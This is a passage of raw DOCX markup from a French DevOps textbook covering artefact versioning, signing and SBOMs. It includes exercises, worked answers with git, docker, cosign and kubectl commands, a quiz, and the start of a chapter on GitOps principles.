        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.307 — Cinq questions d'audit</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96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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quelle version ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étiquette de l'artefact</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Souvent absente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Quel commit ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Métadonnée d'image</w:t>
            </w:r>
          </w:p>
        </w:tc>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À renseigner à la construction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Quel pipeline ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attestation</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Signée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Quelles dépendances ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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SBOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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À générer à chaque publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Depuis quand ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Historique de déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conservé par l'orchestrateur</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UN SBOM NON CONSERVÉ NE SERT À RIEN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Générer un inventaire de composants au moment de la construction est inutile s'il est écrasé à la publication suivante. Archivez-le avec l'artefact, pour au moins la durée de vie de la version en production.</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version publiée est immuable.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version sémantique annonce la compatibilité.</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artefact porte son commit source.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étiquettes mobiles compliquent les enquêtes.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Signer prouve l'origine, pas l'innocuité.</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L'attestation de provenance décrit la construction.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notes de version s'adressent aux utilisateurs.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SBOM doit être conservé avec l'artefact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les artefacts sont publiés et signés. Le chapitre suivant fait converger l'état du cluster vers le dépôt : GitOps.</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80.1 — Préparer une publication</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Une version 1.4.2 doit être publiée avec traçabilité.</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Étiquetez le commit.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Construisez avec métadonnées.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Publiez avec vérification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 80.2 — Écrire une note de version</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Une version ajoute un export, déprécie une route et corrige une faille.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Séparez les sections.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Indiquez la migration.</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Citez le numéro de faille.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 80.3 — Auditer un déploiement</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Un incident survient ; il faut identifier l'artefact exact.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Lisez l'image du déploiement.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Extrayez le commit.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Retrouvez le pipeline.</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80.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>git tag -a v1.4.2 -m "Version 1.4.2"</w:t>
        <w:br/>
        <w:t>git push origin v1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker build \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --label org.opencontainers.image.revision="$(git rev-parse HEAD)" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --label org.opencontainers.image.version="1.4.2" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -t registry.exemple.fr/app:1.4.2 .</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker push registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:t>cosign sign --key cosign.key registry.exemple.fr/app:1.4.2</w:t>
        <w:br/>
        <w:t>cosign verify --key cosign.pub registry.exemple.fr/app:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'étiquette Git et l'étiquette d'image portent la même version : la correspondance est vérifiable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La signature est créée après la publication : elle porte sur l'artefact publié, pas sur l'image locale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 80.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>## 1.5.0 — 2026-11-03</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Ajout</w:t>
        <w:br/>
        <w:t>- Export CSV des rapports (#4902).</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Déprécié</w:t>
        <w:br/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET /api/v1/rapports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : suppression prévue en 2.0.</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Sécurité</w:t>
        <w:br/>
        <w:t xml:space="preserve">- Mise à jour de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>libxml2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2026-12345).</w:t>
        <w:br/>
        <w:br/>
        <w:t>### Migration</w:t>
        <w:br/>
        <w:t xml:space="preserve">Remplacez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/api/v1/rapports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/api/v2/rapports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avant la 2.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La section migration est celle que les utilisateurs cherchent en premier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un numéro de faille permet à un lecteur de vérifier l'exposition de son propre système.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 80.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IMAGE=$(kubectl get deployment app -n production \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -o jsonpath='{.spec.template.spec.containers[0].image}')</w:t>
        <w:br/>
        <w:t>echo "$IMAGE"</w:t>
        <w:br/>
        <w:br/>
        <w:t>crane config "$IMAGE" | jq -r '.config.Labels["org.opencontainers.image.revision"]'</w:t>
        <w:br/>
        <w:br/>
        <w:t>gh attestation verify "oci://$IMAGE" --repo org/app --format json | jq '.verificationResult'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'empreinte est plus fiable que l'étiquette : elle identifie le contenu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'attestation relie l'artefact au workflow qui l'a produit.</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 incrément pour une correction compatible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Majeur</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Mineur</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Correctif</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Aucun</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 xml:space="preserve">Pourquoi ne pas déployer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latest</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Trop lourd</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 contenu n'est pas identifiable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Trop lent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Non signé</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 prouve une signature d'image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L'absence de faille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L'origine et l'intégrité</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La qualité du code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La conformité RGPD</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 contient un SBOM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Les journaux</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L'inventaire des composants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Les secrets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Les tests</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Une étiquette publiée peut-elle être déplacée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Oui, toujours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Oui, en cas d'urgence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Non</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 xml:space="preserve">Seulement sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>main</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le correctif ne casse pas la compatibilité.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut pointer vers un contenu différent à chaque instant.</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La signature ne dit rien de la sécurité du contenu.</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Il liste les composants et leurs versions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Déplacer une étiquette rend toute enquête impossible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>81. GitOps : le dépôt comme source de vérité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Faire converger un cluster vers l'état décrit dans Git, sans accès direct ni dérive silencieuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 80</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Expliquer les quatre principes du GitOps.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Décrire le fonctionnement d'Argo CD et de Flux.</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Organiser un dépôt de déploiement.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Gérer les environnements et la promotion.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Traiter une dérive et un retour arrière.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>81.1 Quatre principes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le GitOps applique les principes du contrôle de version à l'exploitation : l'état désiré vit dans Git, un agent compare en continu le cluster à cet état, et toute modification passe par une demande de fusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="93" name="Picture 93"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f91.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId131"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.91 — La boucle GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.308 — Quatre principes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3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Principe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Conséquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Sans lui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déclaratif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>L'état est décrit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scripts impératifs fragiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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Versionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Historique et retour arrière</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Aucune trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tiré automatiquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
